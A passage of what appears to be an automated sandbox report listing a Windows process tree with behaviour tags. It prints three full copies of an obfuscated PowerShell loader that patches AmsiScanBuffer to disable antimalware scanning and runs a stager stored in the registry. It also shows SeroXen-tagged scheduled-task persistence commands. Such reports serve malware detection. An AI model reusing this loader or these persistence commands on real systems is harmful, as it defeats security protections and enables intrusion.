$_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+'t'+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+'N'+[Char](97)+'t'+[Char](105)+'v'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$wXWVCLOwGUhVcH=$NjzmZAAkwDXxq.GetMethod('Get'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gpKgblwCJZHQRJorNAm=XwSckbyoJfWJ @([String])([IntPtr]);$FVenBIChVWekdhLrpiJiFC=XwSckbyoJfWJ 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XjFxxtTZuQA=$NjzmZAAkwDXxq.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'uleHa'+[Char](110)+''+'d'+''+'l'+'e').Invoke($Null,@([Object]('ke'+'r'+''+'n'+'e'+[Char](108)+''+[Char](51)+'2.'+[Char](100)+''+'l'+''+[Char](108)+'')));$oJSZGHdkDsSpHq=$wXWVCLOwGUhVcH.Invoke($Null,@([Object]$XjFxxtTZuQA,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dL'+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+[Char](121)+''+[Char](65)+'')));$vHrpfSMndukxLikXD=$wXWVCLOwGUhVcH.Invoke($Null,@([Object]$XjFxxtTZuQA,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$nQjXFIE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oJSZGHdkDsSpHq,$gpKgblwCJZHQRJorNAm).Invoke('a'+'m'+''+'s'+'i'+'.'+'d'+'l'+'l');$bfWoVldWPYICLbpdL=$wXWVCLOwGUhVcH.Invoke($Null,@([Object]$nQjXFIE,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+'r')));$hNqJMDyAUC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vHrpfSMndukxLikXD,$FVenBIChVWekdhLrpiJiFC).Invoke($bfWoVldWPYICLbpdL,[uint32]8,4,[ref]$hNqJMDyAUC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bfWoVldWPYICLbpdL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vHrpfSMndukxLikXD,$FVenBIChVWekdhLrpiJiFC).Invoke($bfWoVldWPYICLbpdL,[uint32]8,0x20,[ref]$hNqJMDyAUC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+'s'+''+'t'+'ag'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID 2572
[depth 3] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID 3556
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:paWRZWnyYWQf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mLEtHzMGvFDUcE,[Parameter(Position=1)][Type]$vyZSduXuOv)$WlurpAcHJoO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+'S'+''+'e'+'a'+[Char](108)+'ed'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$WlurpAcHJoO.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+'l'+''+'N'+'a'+'m'+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eBy'+'S'+'i'+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$mLEtHzMGvFDUcE).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+'M'+[Char](97)+''+'n'+''+[Char](97)+'ge'+'d'+'');$WlurpAcHJoO.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+'b'+''+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+
[Char](83)+''+'i'+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$vyZSduXuOv,$mLEtHzMGvFDUcE).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $WlurpAcHJoO.CreateType();}$HsibBDQjNmdgZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+'v'+''+[Char](101)+'Me'+[Char](116)+''+'h'+'od'+[Char](115)+'');$GXMpjTojLLWlZg=$HsibBDQjNmdgZ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wSTiMVKyYvuAaIvKCcb=paWRZWnyYWQf @([String])([IntPtr]);$lMGRbQEqdeUYQlRPqVCbEq=paWRZWnyYWQf 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$sadfHHLPdWa=$HsibBDQjNmdgZ.GetMethod('G'+'e'+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+'e'+'l'+''+[Char](51)+'2'+[Char](46)+''+'d'+'ll')));$ZZqMSwagQLbIwo=$GXMpjTojLLWlZg.Invoke($Null,@([Object]$sadfHHLPdWa,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+'L'+''+[Char](105)+'b'+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$BvqkJcyrmMzWbbPqU=$GXMpjTojLLWlZg.Invoke($Null,@([Object]$sadfHHLPdWa,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+'al'+'P'+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$XicCpLf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZZqMSwagQLbIwo,$wSTiMVKyYvuAaIvKCcb).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$vKfJOWkKMAOSPilNu=$GXMpjTojLLWlZg.Invoke($Null,@([Object]$XicCpLf,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+'u'+'f'+[Char](102)+''+[Char](101)+''+'r'+'')));$gItzdDLMWy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BvqkJcyrmMzWbbPqU,$lMGRbQEqdeUYQlRPqVCbEq).Invoke($vKfJOWkKMAOSPilNu,[uint32]8,4,[ref]$gItzdDLMWy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vKfJOWkKMAOSPilNu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BvqkJcyrmMzWbbPqU,$lMGRbQEqdeUYQlRPqVCbEq).Invoke($vKfJOWkKMAOSPilNu,[uint32]8,0x20,[ref]$gItzdDLMWy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FTWA'+[Char](82)+''+'E'+'').GetValue('$77'+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID 908
[depth 3] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID 3100
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pTyMYVhjyUpr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aGmSFSUQvZkdMC,[Parameter(Position=1)][Type]$otyEQUFSjn)$VxZnuiOOiWn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+'le'+[Char](99)+''+'t'+''+'e'+'d'+[Char](68)+''+'e'+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+'M'+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e'+'T'+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'led'+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$VxZnuiOOiWn.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$aGmSFSUQvZkdMC).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e,Ma'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$VxZnuiOOiWn.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+'
'+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+'e'+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+'V'+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+'l',$otyEQUFSjn,$aGmSFSUQvZkdMC).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'me'+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $VxZnuiOOiWn.CreateType();}$PuHZBmMarkXcQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+'t'+''+[Char](101)+'m'+[Char](46)+''+'d'+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+'sa'+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+'v'+[Char](101)+''+[Char](77)+''+'e'+'t'+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$rJDOzOsTBDlRxa=$PuHZBmMarkXcQ.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+'c'+'Ad'+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+',S'+[Char](116)+'at'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bTdBeeyoexzRkWTTAER=pTyMYVhjyUpr @([String])([IntPtr]);$KIrLQDQFWFoboRGBdkmIrN=pTyMYVhjyUpr 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pAZwYVqiQXC=$PuHZBmMarkXcQ.GetMethod('G'+[Char](101)+'t'+[Char](77)+''+'o'+''+[Char](100)+'ul'+'e'+'Ha'+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+'l')));$QDwIWoOyLkcsQq=$rJDOzOsTBDlRxa.Invoke($Null,@([Object]$pAZwYVqiQXC,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$mryRhSLKEWmxoMTRw=$rJDOzOsTBDlRxa.Invoke($Null,@([Object]$pAZwYVqiQXC,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$VcRdwYj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QDwIWoOyLkcsQq,$bTdBeeyoexzRkWTTAER).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+'.'+'dl'+[Char](108)+'');$RgmLSyZqTgScfQSbe=$rJDOzOsTBDlRxa.Invoke($Null,@([Object]$VcRdwYj,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'er')));$ZkIkogeJaN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mryRhSLKEWmxoMTRw,$KIrLQDQFWFoboRGBdkmIrN).Invoke($RgmLSyZqTgScfQSbe,[uint32]8,4,[ref]$ZkIkogeJaN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RgmLSyZqTgScfQSbe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mryRhSLKEWmxoMTRw,$KIrLQDQFWFoboRGBdkmIrN).Invoke($RgmLSyZqTgScfQSbe,[uint32]8,0x20,[ref]$ZkIkogeJaN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+'WA'+[Char](82)+''+'E'+'').GetValue('$'+[Char](55)+'7'+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:3804 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:460
-
-
-
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc  (PID 1104)
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi  (PID 1172)
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc  (PID 1228)
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm  (PID 1252)
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager  (PID 1368)
    sihost.exe  (image C:\Windows\system32\sihost.exe, PID 3060)
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog  (PID 1384)
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc  (PID 1416)
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem  (PID 1504)
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes  (PID 1520)
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS  (PID 1660)
C:\Windows\system32\svchost.exe -k NetworkService -p  (PID 1704)
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder  (PID 1716)
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp  (PID 1812)
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  (PID 1824)
  - Modifies Internet Explorer settings
    C:\Windows\system32\AUDIODG.EXE 0x00000000000004B8 0x00000000000004CC  (PID 3732)
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  (PID 1892)
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p  (PID 1904)
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection  (PID 1988)
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository  (PID 2028)
C:\Windows\System32\spoolsv.exe  (PID 1864)
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation  (PID 2204)
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT  (PID 2380)
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent  (PID 2388)
C:\Windows\system32\svchost.exe -k NetworkService -p  (PID 2416)
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer  (PID 2508)
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc  (PID 2516)
C:\Windows\sysmon.exe  (PID 2532)
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks  (PID 2556)
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt  (PID 2576)
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService  (PID 2592)
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc  (PID 2272)
C:\Windows\system32\wbem\unsecapp.exe -Embedding  (PID 2164)
C:\Windows\Explorer.EXE  (PID 3292)
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of UnmapMainImage
    "C:\Users\Admin\AppData\Local\Temp\Uni.exe"  (PID 3584)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f  (image C:\Windows\SysWOW64\schtasks.exe, PID 4424)
          - Creates scheduled task(s)
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"  (PID 4132)
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
            "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f  (image C:\Windows\SysWOW64\schtasks.exe, PID 2132)
              - Creates scheduled task(s)
            "C:\Users\Admin\AppData\Local\Temp\install.exe"  (PID 2812)
              - Executes dropped EXE
            "C:\Users\Admin\AppData\Local\Temp\tUCkOmZwRnsY.exe"  (PID 656)
              - Executes dropped EXE
            "schtasks" /delete /tn "SeroXen" /f  (image C:\Windows\SysWOW64\schtasks.exe, PID 4800)
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  (image C:\Windows\System32\Conhost.exe, PID 4552)
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QGt1lQ2ztLkj.bat" "  (image C:\Windows\SysWOW64\cmd.exe, PID 4672)
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  (image C:\Windows\System32\Conhost.exe, PID 4152)
                chcp 65001  (image C:\Windows\SysWOW64\chcp.com, PID 1352)
                ping -n 10 localhost  (image C:\Windows\SysWOW64\PING.EXE, PID 2104)
                  - Runs ping.exe
            "C:\Users\Admin\AppData\Local\Temp\install.exe"  (PID 2156)
              - Executes dropped EXE
            "SCHTASKS.exe" /create /tn "$77Client.exe" /tr "'C:\Users\Admin\AppData\Roaming\SubDir\Client.exe'" /sc onlogon /rl HIGHEST  (image C:\Windows\SysWOW64\SCHTASKS.exe, PID 5104)
              - Creates scheduled task(s)
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  (image C:\Windows\System32\Conhost.exe, PID 2088)
        "C:\Users\Admin\AppData\Local\Temp\install.exe"  (PID 4416)
          - Executes dropped EXE
        "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST  (image C:\Windows\SysWOW64\SCHTASKS.exe, PID 2036)
          - Creates scheduled task(s)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default  (PID 2336)
      - Enumerates system info in registry
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ffee7773cb8,0x7ffee7773cc8,0x7ffee7773cd8  (PID 3340)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAA AAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:2  (PID 1028)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3  (PID 3488)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:8  (PID 2764)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1  (PID 2280)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1  (PID 4592)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1  (PID 996)
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1  (PID 236)
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc  (PID 3420)
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo  (PID 3468)
C:\Windows\System32\RuntimeBroker.exe -Embedding  (PID 3832)
C:\Windows\System32\RuntimeBroker.exe -Embedding  (PID 3908)
  - Suspicious use of UnmapMainImage
